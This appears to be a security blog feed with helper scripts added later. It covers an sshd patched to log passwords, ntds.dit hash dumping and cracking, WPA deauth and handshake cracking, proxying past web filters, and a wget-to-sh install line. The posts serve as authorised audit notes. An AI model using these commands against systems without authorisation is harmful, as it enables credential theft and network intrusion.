Security And Hacking – Lance Grover https://www.lancegrover.com

Join a firejail session https://www.lancegrover.com/join-a-firejail-session/ Fri, 25 Aug 2017 20:55:26 +0000

Sometimes I use firejail… well, a lot actually… and I usually just use it for a browser like this:

firejail --private google-chrome

or this

firejail --private google-chrome --proxy-server="socks5://localhost:8080"

But on a few occasions I want to join a second shell (for example to run ssh from inside the sandbox) to the same sandbox instance, so I do this:

firejail --list

firejail --join=3452
(or whatever session you want; --list prints one line per running sandbox and the first field of each line is its PID)

Another thing I have run into: I downloaded something in a --private session but want to save it before I destroy the sandbox (the private home directory is thrown away with it), so I do this:

firejail --get=5255 ~/.config/google-chrome/Default/Cookies


You can see more examples and other documentation here:

Firejail Usage
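A few shell helpers for the list/join/get workflow above, so you don't have to copy PIDs by hand. This is an added example, not code from the original post; it assumes the `firejail --list` line format `pid:user:name:command` (one sandbox per line), and the function names are my own.

```shell
# Helpers around firejail --list / --join / --get (added example, not from the post).
# Assumes --list prints "pid:user:name:command", one sandbox per line.

# Return the PID of the first sandbox whose command line contains $1.
# Reads the listing from stdin so it can be exercised on a canned listing.
fj_pid_from_listing() {
    awk -F: -v pat="$1" '
        # fields: 1=pid 2=user 3=name 4..NF=command (the command itself may contain colons)
        { cmd = ""; for (i = 4; i <= NF; i++) cmd = cmd (i > 4 ? ":" : "") $i }
        index(cmd, pat) { print $1; exit }
    '
}

# Same lookup against the live firejail listing.
fj_pid() {
    firejail --list | fj_pid_from_listing "$1"
}

# Open a shell inside the sandbox running the given command (e.g. fj_join google-chrome).
fj_join() {
    pid=$(fj_pid "$1")
    [ -n "$pid" ] || { echo "no sandbox matching '$1'" >&2; return 1; }
    firejail --join="$pid"
}

# Copy a file out of a --private sandbox before it (and its temporary home) goes away.
# $1 = command substring, $2 = path as seen inside the sandbox.
fj_save() {
    pid=$(fj_pid "$1")
    [ -n "$pid" ] || { echo "no sandbox matching '$1'" >&2; return 1; }
    firejail --get="$pid" "$2"
}
```

Usage: `fj_save google-chrome ~/.config/google-chrome/Default/Cookies` pulls the file into the current directory; `fj_join google-chrome` drops you into that sandbox's shell.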

A little ssh honeypot fun https://www.lancegrover.com/a-little-ssh-honeypot-fun/ Tue, 25 Jul 2017 17:03:43 +0000

I say honeypot, but really it isn't a honeypot… it is something I am using to log/capture data from malicious individuals, so that is the reason I say honeypot.

I want to patch sshd to log every username/password attempt.

CentOS 7

yum install git make zlib-devel openssl-devel openssh-devel pam-devel screen autoconf gcc vim-enhanced lsof
git clone https://github.com/openssh/openssh-portable.git
cd openssh-portable/
autoreconf
./configure
vim auth-passwd.c (add my little log line in the auth_password function)

//for Lanix
logit("sshd credentials:%s:%s", authctxt->user, password);

make
We are going to use the existing sshd_config and the current ssh_host_keys so that nobody remote can easily identify the trap (same host key and options as the real sshd).
cp /etc/ssh/sshd_config /root/  (modify this, since there are several features we didn't compile into our sshd and it will throw errors on those options; to test I also run it on a different port first)
cp /etc/ssh/ssh_host_* /root/
chmod 0600 /root/ssh_host_*
/root/openssh-portable/sshd -f /root/sshd_config -D (I test with -D, foreground, so that I can easily stop the program)
This will log things in /var/log/secure on a CentOS 7 box, just look for the "sshd credentials" LOL
Keep in mind those lines contain cleartext passwords: keep the log readable by root only, and don't run this build on a host where real users log in.

Debian

apt-get update
apt-get install zlib1g-dev screen vim make gcc autoconf git libssl1.0-dev
(libssl1.0-dev because the regular libssl-dev throws errors on compile of ssh, well, as of right now)
(not sure if these are needed yet) apt-get install libcrypto++-dev libgcrypt20 libcrypto++6 libcrypto++-utils r-cran-openssl
git clone https://github.com/openssh/openssh-portable.git
cd openssh-portable/
autoreconf
./configure

vim auth-passwd.c (add my little log line in the auth_password function)

//for Lanix
logit("sshd credentials:%s:%s", authctxt->user, password);

make
We are going to use the existing sshd_config and the current ssh_host_keys so that nobody remote can easily identify the trap (same host key and options as the real sshd).
cp /etc/ssh/sshd_config /root/  (modify this, since there are several features we didn't compile into our sshd and it will throw errors on those options; to test I also run it on a different port first)
cp /etc/ssh/ssh_host_* /root/
chmod 0600 /root/ssh_host_*
/root/openssh-portable/sshd -f /root/sshd_config -D (I test with -D, foreground, so that I can easily stop the program)
This will log things in /var/log/auth.log, just look for the "sshd credentials" LOL
Same warning as above: the lines hold cleartext passwords, so restrict the log and keep this sshd on a host with no real users.
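Once the trap has run for a while you want to know what is being sprayed at it. The script below is an added example (not part of the original post) that summarises the "sshd credentials" lines from /var/log/secure or /var/log/auth.log; the log lines in the test are constructed. It splits on the first colon after the marker only, because a username cannot contain ":" but a guessed password certainly can.

```shell
# Added example (not from the post): summarise what the patched sshd logged.
# Reads syslog lines on stdin and keeps only the "sshd credentials:user:password"
# ones. Username cannot contain ":" but the password can, so only the first ":"
# after the marker separates the two.

MARK='sshd credentials:'
TAB=$(printf '\t')

# Print "count<TAB>user<TAB>password", most frequent first.
cred_pairs() {
    awk -v mark="$MARK" '
        {
            i = index($0, mark); if (i == 0) next          # not one of our lines
            rest = substr($0, i + length(mark))
            c = index(rest, ":"); if (c == 0) next          # malformed, skip
            key = substr(rest, 1, c - 1) "\t" substr(rest, c + 1)
            n[key]++
        }
        END { for (k in n) printf "%d\t%s\n", n[k], k }
    ' | sort -rn
}

# Same, but counting passwords alone (what the scanners are actually spraying).
cred_passwords() {
    cred_pairs | awk -F "$TAB" '
        { n[$3] += $1 }
        END { for (p in n) printf "%d\t%s\n", n[p], p }
    ' | sort -rn
}
```

Usage: `grep 'sshd credentials' /var/log/secure | cred_pairs | head` (or `cred_passwords`); pipe the whole file in, the marker filter is done inside.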

Windows (windblows) password audit notes https://www.lancegrover.com/windows-windblows-password-audit-notes/ Fri, 30 Jun 2017 14:50:02 +0000

Well, it's that time of the year/quarter/month… whatever policy you have on performing the password audit. Some of my notes are from references that are a few years old, so I'm not sure they will be around much longer; I hope so, they have good info. Keep in mind I am using Kali 2017.1 for my fun today.

First Windows password audit, or as I call it, Windblows Password Audit.

  • Retrieve the ntds.dit and SYSTEM file (notes from https://www.cyberis.co.uk/2014/02/obtaining-ntdsdit-using-in-built.html):
    • C:\>ntdsutil
    • ntdsutil: Activate Instance ntds
    • ntdsutil: ifm
    • ifm: create full c:\cool-pass-pentest-audit
    • ifm: quit
    • ntdsutil: quit
  • copy the c:\cool-pass-pentest-audit folder to your kali box (this folder holds every password hash in the domain, so move it over an encrypted channel, keep it on encrypted disk, and wipe it when the audit is done)
  • install the libesedb-utils
    • apt install libesedb-utils
  • export the ntds tables (notes from the same cyberis.co.uk post)
    • esedbexport -m tables ntds.dit
    • (this may take a while… a long while)
  • Now we need to extract the hashes…
    • currently I am using this: https://github.com/csababarta/ntdsxtract
      • git clone https://github.com/csababarta/ntdsxtract.git
    • python ntdsxtract/dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.6 hashdumpwork --syshive SYSTEM --passwordhashes --lmoutfile lm-out.txt --ntoutfile nt-out.txt --pwdformat ocl
  • Now we can do some cracking, using hashcat (since I like to use GPUs)
    • We will start with the rockyou.txt.gz wordlist that came with my kali install
      • cd /usr/share/wordlists; gunzip rockyou.txt.gz; cd -
      • hashcat -a 0 -m 1000 --username hashdumpwork/nt-out.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule
        • I like to use most of the rule sets that come with the hashcat install on kali; I tend to get a bit of success with the different ones, but I will just give the example using rockyou-30000.rule
  • You want to see what passwords you got when it is over? Just run the same hashcat command but add the --show flag and presto!
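Cracking is only half of the audit; the dump itself already tells you about empty passwords and password reuse. The script below is an added example, not from the original post: it reads the ntdsxtract "ocl" output (one `username:nthash` per line) and the `hashcat --show` output (`username:nthash:plaintext`). The empty-string NT hash is the real value; the other hashes and usernames in the test are constructed, and the function names are mine.

```shell
# Added example (not from the post): quick audit checks over the ntdsxtract "ocl"
# dump (user:nthash) and the hashcat --show output (user:nthash:plaintext).

EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of the empty string (real value)

# Accounts whose NT hash is the empty-password hash. stdin: user:hash lines.
nt_empty_accounts() {
    awk -F: -v e="$EMPTY_NT" 'tolower($2) == e { print $1 }'
}

# Groups of accounts that share one NT hash, i.e. the same password.
# stdin: user:hash lines; output "hash user1,user2,..." for hashes used more than once.
nt_shared_hashes() {
    awk -F: '
        { h = tolower($2); n[h]++; u[h] = (n[h] == 1) ? $1 : u[h] "," $1 }
        END { for (h in n) if (n[h] > 1) print h, u[h] }
    ' | sort
}

# Cracked/total accounts. $1 = user:hash dump, $2 = file holding hashcat --show output.
nt_crack_rate() {
    awk -F: '
        FILENAME == ARGV[1] { total++; next }   # first file: every account
        { cracked++ }                           # second file: one line per cracked account
        END { printf "%d/%d\n", cracked, total }
    ' "$1" "$2"
}
```

Usage: `nt_empty_accounts < hashdumpwork/nt-out.txt`, `nt_shared_hashes < hashdumpwork/nt-out.txt`, and after the run `hashcat ... --show > cracked.txt; nt_crack_rate hashdumpwork/nt-out.txt cracked.txt`. Shared hashes between an admin and a service account are usually the most interesting finding in the whole report.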
SSH proxy through my VM cloud server (using firejail and chrome) https://www.lancegrover.com/ssh-proxy-through-my-vm-cloud-server-using-firejail-and-chrome/ Fri, 30 Jun 2017 14:23:39 +0000

Oh… you have country blocking turned on at the firewall… or some other web filter or firewall that is preventing you from viewing a website.

Keep in mind you do need a server you have access to via ssh… I like cloud servers, they tend to not have web filters..lol

First we need to set up the ssh socks5 proxy: we ssh into our VM (virtual machine server) and proxy through it on local port 8080 (ssh binds a -D port to loopback unless you give it a bind address, so only this machine can use it):
ssh -D 8080 myuser@myserver.mydomain

Now, keep in mind I am using Kali 2017.1 for this next part, but you can use other distros and even configure other browsers to connect to your localhost:8080 proxy. I am using firejail and google-chrome. Firejail gives me an independent, isolated browser, so I can still have my regular browser up and running as needed. This is how we connect:
firejail --private google-chrome --proxy-server="socks5://localhost:8080"

Boom, good times…
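The two commands above, wrapped so the tunnel is brought up in the background and checked before the browser starts. This is an added example, not from the original post; it assumes `ssh`, `ss` (iproute2) and `firejail` are installed, and the `ss -ltn` column layout `State Recv-Q Send-Q Local-Address:Port Peer-Address:Port`. The check matters because a SOCKS port bound to 0.0.0.0 hands your tunnel to everyone on the local network.

```shell
# Added example (not from the post): start the SSH SOCKS tunnel, confirm it is
# bound to loopback only, then launch the sandboxed browser through it.

PROXY_PORT=${PROXY_PORT:-8080}

# Given "ss -ltn" output on stdin, succeed only if something listens on port $1
# and every such listener is on a loopback address (127.0.0.1 or [::1]).
listener_is_loopback_only() {
    awk -v port="$1" '
        $1 == "LISTEN" {
            n = split($4, a, ":"); p = a[n]               # port is the last ":"-separated piece
            if (p != port) next
            addr = substr($4, 1, length($4) - length(p) - 1)
            found = 1
            if (addr != "127.0.0.1" && addr != "[::1]") bad = 1
        }
        END { exit (found && !bad) ? 0 : 1 }
    '
}

# $1 = user@host. -N: no remote command, -f: go to background once authenticated.
socks_tunnel() {
    ssh -f -N -D "127.0.0.1:$PROXY_PORT" "$1" || return 1
    ss -ltn | listener_is_loopback_only "$PROXY_PORT" || {
        echo "SOCKS port $PROXY_PORT is not listening on loopback only" >&2
        return 1
    }
}

proxied_chrome() {
    firejail --private google-chrome --proxy-server="socks5://localhost:$PROXY_PORT"
}
```

Usage: `socks_tunnel myuser@myserver.mydomain && proxied_chrome`. Kill the background ssh when you are done (`pkill -f "ssh -f -N -D 127.0.0.1:$PROXY_PORT"`), otherwise the tunnel outlives the browser.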

limit ssh to specific hosts with firewalld (firewall-cmd) https://www.lancegrover.com/limit-ssh-to-specific-hosts-with-firewalld-firewall-cmd/ Tue, 23 Jun 2015 16:22:24 +0000

Here is a little reminder on how to limit ssh (or any port really) to specific IPs using firewalld. Be aware of what the trusted zone means: every connection from a source in that zone is accepted, not only ssh, so the --add-service=ssh on trusted is redundant and those two hosts get every port. That is fine for a management box you fully trust; otherwise use a rich rule in the public zone that accepts just the ssh service from the address. Either way, run the two public-zone removals last and from a session that comes from one of the allowed addresses, or you will lock yourself out.

systemctl start firewalld.service
systemctl enable firewalld.service
firewall-cmd --zone="trusted" --add-source=<external IP 1>
firewall-cmd --zone="trusted" --add-source=<external IP 1> --permanent
firewall-cmd --zone="trusted" --add-source=<external IP 2>
firewall-cmd --zone="trusted" --add-source=<external IP 2> --permanent
firewall-cmd --zone="trusted" --add-service=ssh
firewall-cmd --zone="trusted" --add-service=ssh --permanent
firewall-cmd --zone="trusted" --list-all
firewall-cmd --zone=public --remove-service=ssh
firewall-cmd --zone=public --remove-service=ssh --permanent
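The narrower variant, as an added example that is not from the original post: ssh only, from the listed addresses, via rich rules in the public zone, with the address validated before it is handed to firewall-cmd and the blanket ssh allow removed only after the rules are in place. It assumes firewalld is running and IPv4 addresses; the function names are mine.

```shell
# Added example (not from the post): allow the ssh service from specific IPv4
# addresses/CIDRs with firewalld rich rules in the public zone, instead of putting
# the sources in the trusted zone (which accepts every port from them).

# Succeed if $1 is a dotted-quad IPv4 address with an optional /0-32 prefix.
is_ipv4_cidr() {
    printf '%s\n' "$1" | awk -F/ '
        NF > 2 { exit 1 }
        NF == 2 && ($2 !~ /^[0-9]+$/ || $2 + 0 > 32) { exit 1 }
        {
            n = split($1, o, "."); if (n != 4) exit 1
            for (i = 1; i <= 4; i++) if (o[i] !~ /^[0-9]+$/ || o[i] + 0 > 255) exit 1
            exit 0
        }'
}

# Build the rich rule accepting service $2 from source $1.
rich_rule_for() {
    printf 'rule family="ipv4" source address="%s" service name="%s" accept' "$1" "$2"
}

# Apply runtime + permanent rules for each address in $@, then drop the open ssh allow.
restrict_ssh_to() {
    for ip in "$@"; do
        is_ipv4_cidr "$ip" || { echo "refusing bad address: $ip" >&2; return 1; }
    done
    for ip in "$@"; do
        rule=$(rich_rule_for "$ip" ssh)
        firewall-cmd --zone=public --add-rich-rule="$rule"
        firewall-cmd --zone=public --add-rich-rule="$rule" --permanent
    done
    # Only now remove the blanket allow, so an allowed host is never cut off mid-change.
    firewall-cmd --zone=public --remove-service=ssh
    firewall-cmd --zone=public --remove-service=ssh --permanent
    firewall-cmd --zone=public --list-rich-rules
}
```

Usage: `restrict_ssh_to 203.0.113.5 198.51.100.0/24`. Run it from a session originating at one of those addresses.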

How about a little aircrack of wpa? https://www.lancegrover.com/how-about-a-little-aircrack-of-wpa/ Mon, 15 Jun 2015 19:42:28 +0000

Make sure you own the network/wireless access point or have permission to attack/break in to the WPA network you are attacking before you start. In this case I got permission, and I have several witnesses and documentation to support it.

First, with wlan1 in monitor mode (airmon-ng start wlan1; newer aircrack-ng versions name the monitor interface wlan1mon), scan to find the network (-i is --ivs, save IVs only, which you don't want for a WPA capture, so leave it off):
airodump-ng wlan1

Focus in on that one access point on its channel and capture the goodies:
airodump-ng --bssid 00:1E:52:78:AA:5C -c 6 --write WPAcrack wlan1

On another interface, send deauths to force clients to reconnect (that reconnect is the 4-way handshake you want):
aireplay-ng --deauth 100 -a 00:1E:52:78:AA:5C wlan2

Notice the "WPA handshake: 00:1E:52:78:AA:5C" at the top of the airodump screen? That is the capture you need; you can stop airodump-ng once it shows up.

Now crack it with this:
aircrack-ng WPAcrack-01.cap -w /usr/share/wordlists/dirb/big.txt

Or by using john the ripper to feed candidates in:
john --incremental=all --session=WirelessBrute --stdout | aircrack-ng -a 2 -b 00:1E:52:78:AA:5C WPAcrack-01.cap -w -

Resume works as well:
john --restore=WirelessBrute | aircrack-ng -a 2 -b 00:1E:52:78:AA:5C WPAcrack-01.cap -w -
The other one I am doing right now:
john --incremental=all --session=BruteRockSteady --stdout | aircrack-ng -a 2 -b 88:1F:A1:38:9C:90 WPAcrackRock_Steady-01.cap -w -
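Copying the BSSID and channel off the airodump-ng screen by hand is where typos creep in, so here is an added example (not from the original post) that resolves them from the CSV airodump-ng writes with --write. It assumes the airodump-ng CSV layout (BSSID first, channel fourth, ESSID fourteenth, AP rows followed by a "Station MAC" section) and that the interfaces are already in monitor mode; the CSV in the test is constructed around the BSSIDs in the post, and the function names are mine.

```shell
# Added example (not from the post): resolve an ESSID to "BSSID channel" from an
# airodump-ng CSV scan, so the capture and deauth commands get the right values.
# Assumes the airodump-ng CSV column order: BSSID(1) ... channel(4) ... ESSID(14).

# Print "BSSID channel" for the AP whose ESSID is $1; CSV on stdin. Empty if not seen.
ap_for_essid() {
    awk -F',' -v essid="$1" '
        /^Station MAC/ { exit }                 # client section starts, no more APs
        NF >= 14 {
            for (i = 1; i <= NF; i++) { sub(/^ +/, "", $i); sub(/ +$/, "", $i) }
            if ($14 == essid) { print $1, $4; exit }
        }'
}

# Scan on interface $1 for $2 seconds (fresh scan-01.csv), then look up ESSID $3.
wpa_target() {
    rm -f scan-*.csv                            # otherwise airodump-ng writes scan-02.csv
    timeout "$2" airodump-ng --write scan --output-format csv "$1" >/dev/null 2>&1
    ap_for_essid "$3" < scan-01.csv
}

# Typical use, in two terminals once the target is known:
#   ap=$(wpa_target wlan1 30 "Rock Steady") && bssid=${ap% *} && chan=${ap#* }
#   airodump-ng --bssid "$bssid" -c "$chan" --write WPAcrack wlan1
#   aireplay-ng --deauth 10 -a "$bssid" wlan2
```

ESSIDs containing a comma will not resolve with this simple split; for those, read the BSSID off the screen as before.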



Thanks to the following for information/tutorial :

https://www.hackthissite.org/articles/read/1094

http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/

Proxy web traffic through your linux server? https://www.lancegrover.com/proxy-web-traffic-through-your-linux-server/ Wed, 20 May 2015 13:35:46 +0000

sshuttle is a fun little application that basically acts as a quick and easy VPN over ssh.

As an ethical hacker you can also use this to proxy your traffic over this connection….think of the possibilities.

This is an easy one to set up. On the server side just make sure you have python installed. On the client side you need sshuttle installed, and you need root-level access there since it changes routing and firewall rules.

Now to actually start routing traffic over ssh:

sshuttle -r username@sshserver 0.0.0.0/0 -vv

to route dns traffic

sshuttle --dns -vvr username@sshserver 0/0

Setup OSSEC agent on a CentOS7 system with Alienvault server https://www.lancegrover.com/setup-ossec-agent-on-a-centos7-system-with-alienvault-server/ Thu, 14 May 2015 18:49:49 +0000

Time to get some OSSEC on and connect an agent to Alienvault… There are a lot of people out there compiling from source, not many using the RPMs, or they forget to install both RPMs…

  1. wget -q -O - http://www.atomicorp.com/installers/atomic.sh | sh
     (this runs a script straight off the network as root; better to wget it to a file, read it, and only then run it)
  2. yum install ossec-hids ossec-hids-client
  3. add agent config to Alienvault
  4. extract key
  5. # /var/ossec/bin/manage_client
    (I – to import the key from Alienvault)
  6. modify /var/ossec/etc/ossec-agent.conf
    (change server ip address)
  7. service ossec-hids start
  8. chkconfig ossec-hids on
  9. On the Alienvault server – restart the ossec server in Environment-Detection-HIDS-Ossec Control
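Step 6 is the one people get wrong by hand-editing the XML. The helper below is an added example, not from the original post: it rewrites the server address in the agent config and refuses to continue unless the file now says what you asked for. It assumes the stock agent config layout with a `<server-ip>` element inside `<client>` (the sample file in the test is constructed), and the function names are mine.

```shell
# Added example (not from the post): set and verify the OSSEC agent's server-ip.
# Assumes /var/ossec/etc/ossec-agent.conf contains
#   <client><server-ip>ADDRESS</server-ip></client>
# which is the stock layout.

OSSEC_CONF=${OSSEC_CONF:-/var/ossec/etc/ossec-agent.conf}

# Print the server-ip configured in file $1.
ossec_get_server() {
    sed -n 's#.*<server-ip>\([^<]*\)</server-ip>.*#\1#p' "$1"
}

# Replace the server-ip in file $1 with $2; succeed only if the file now reads back $2.
ossec_set_server() {
    sed -i "s#<server-ip>[^<]*</server-ip>#<server-ip>$2</server-ip>#" "$1"
    [ "$(ossec_get_server "$1")" = "$2" ]
}

# Steps 5-8 from the post, driven by the helper. $1 = Alienvault server IP.
ossec_point_agent() {
    ossec_set_server "$OSSEC_CONF" "$1" || { echo "server-ip not updated in $OSSEC_CONF" >&2; return 1; }
    /var/ossec/bin/manage_client      # I: import the key copied from Alienvault
    service ossec-hids start
    chkconfig ossec-hids on
}
```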
Too many Tickets and Alarms in your Alienvault system? https://www.lancegrover.com/too-many-tickets-and-alarms-in-your-alienvault-system/ Wed, 13 May 2015 17:26:54 +0000

Working on an Alienvault IDS system, the company that was setting it up made some mistakes and had over 50k alarms and over 50k tickets that they wanted removed. Time to do some database changes to clear those out. Take a database backup before you start; these updates touch every row and there is no undo.

  1. ssh into the Alienvault database server or all-in-one server, and jailbreak to the command line.
  2. use the ossim-db command:
    #  ossim-db
  3. use the alienvault database:
    > use alienvault
  4. First let's look at the tables involved with tickets, or incidents:
    > show tables like 'incident%';
  5. Preview the open incidents, then mark them all as closed:
    > select * from incident where not status = "Closed" limit 5;
    > update incident set status = "Closed";
  6. Now look at the alarm tables:
    > show tables like 'alarm%';
  7. Now mark all alarms as closed:
    > update alarm set status = "closed";
  8. Note: the incidents use a capital C on Closed, and the alarms use a lower case c on closed.
Installing Fusion-io/Sandisk ioDrive2 drivers on CentOS7 with LUKS encryption https://www.lancegrover.com/installing-fusion-iosandisk-iodrive2-drivers-on-centos7-with-luks-encryption/ Fri, 08 May 2015 15:09:59 +0000

I was working on a Mongo database server that was going to be running a Fusion-io/Sandisk ioDrive2 card for wicked speed, and also needed to do on-disk encryption… fun task. I am using CentOS 7 and ioDrive2 drivers version 3.2.10. I wanted auto mounting of the space, so I can have the services start on reboot (after putting in the passphrase).

1. download drivers from https://link.sandisk.com/Home/SoftwareDownload (may need to make account first) (in this case v 3.2.10)

2. # tar xvf fusionio-files-*.tar
3. # uname -r (now check the binary available does it match your kernel? – mine did not)
4. # cd fusionio-files-*/ioDrive2/Linux_centos-7/3.2.10/Software\ Source
5. # rpmbuild --rebuild iomemory-vsl-3.2.10.1509-1.0.el7.centos.src.rpm
6. # cd ~/rpmbuild/RPMS/x86_64/
7. # yum install iomemory-vsl-3.10.0*.rpm iomemory-vsl-config-3.10.0-*.rpm iomemory-vsl-source-3.2.10*.rpm
8. # cd ~/fusionio-files-*/ioDrive2/Linux_centos-7/3.2.10/Utilities/
9. # yum install fio*.rpm
10. # yum install lib*.rpm
11. # mkdir /var/lib/mongo
12. # modprobe iomemory-vsl
13. # dmesg (to verify that the device was found)

**** now setup LUKS encryption ****

14. # cryptsetup -y create iomongo /dev/fioa
(note: "cryptsetup create" sets up plain dm-crypt, not LUKS: there is no on-disk header, the key is derived straight from the passphrase, and a mistyped passphrase just maps garbage instead of failing; for real LUKS use "cryptsetup -y luksFormat /dev/fioa" followed by "cryptsetup open /dev/fioa iomongo", and the steps below stay the same)
15. # mkfs.xfs /dev/mapper/iomongo
16. # mount /dev/mapper/iomongo /var/lib/mongo
17. # vim /etc/crypttab
add the line:
iomongo /dev/fioa none
18. # vim /etc/sysconfig/iomemory-vsl
uncomment the following:
ENABLED=1
modify and add the mount points:
MOUNTS="/var/lib/mongo"
19. # reboot
(verify everything comes up; notice that if you have other LUKS encrypted devices and you use the same password on all of them, you will only be asked once for a password and all your devices should work)
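The LUKS flow for the same device, as an added example that is not from the original post, with a check that a block device actually carries a LUKS header before you trust it (a plain dm-crypt device set up with "cryptsetup create" has none). The LUKS magic bytes are the real on-disk value; the device and mapping names come from the post, the function names are mine, and the test runs the header check against constructed files rather than a real device.

```shell
# Added example (not from the post): real LUKS setup for the ioDrive, plus a check
# for the LUKS on-disk header. LUKS1 and LUKS2 both begin with "LUKS" 0xBA 0xBE.

# Succeed if the first six bytes of $1 are the LUKS magic.
has_luks_header() {
    [ "$(head -c 6 "$1" | od -An -tx1 | tr -d ' \n')" = "4c554b53babe" ]
}

# $1 = raw device (default /dev/fioa), $2 = mapping name (default iomongo).
luks_setup_iodrive() {
    dev=${1:-/dev/fioa}; name=${2:-iomongo}
    if has_luks_header "$dev"; then
        echo "$dev already has a LUKS header, refusing to format it again" >&2
        return 1
    fi
    cryptsetup -y luksFormat "$dev"         # writes the header: salt, key slots, passphrase check
    cryptsetup open "$dev" "$name"          # prompts for the passphrase; a wrong one fails here
    mkfs.xfs "/dev/mapper/$name"
    # crypttab line as in the post: "none" means prompt for the passphrase at boot
    grep -q "^$name " /etc/crypttab || printf '%s %s none\n' "$name" "$dev" >> /etc/crypttab
    has_luks_header "$dev"                  # final sanity check on what is now on disk
}
```

Run `has_luks_header /dev/fioa` on the box set up with the steps above: if it fails, what you have is plain dm-crypt, not LUKS, and a reformat (after backing up the data) is the way to get there.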
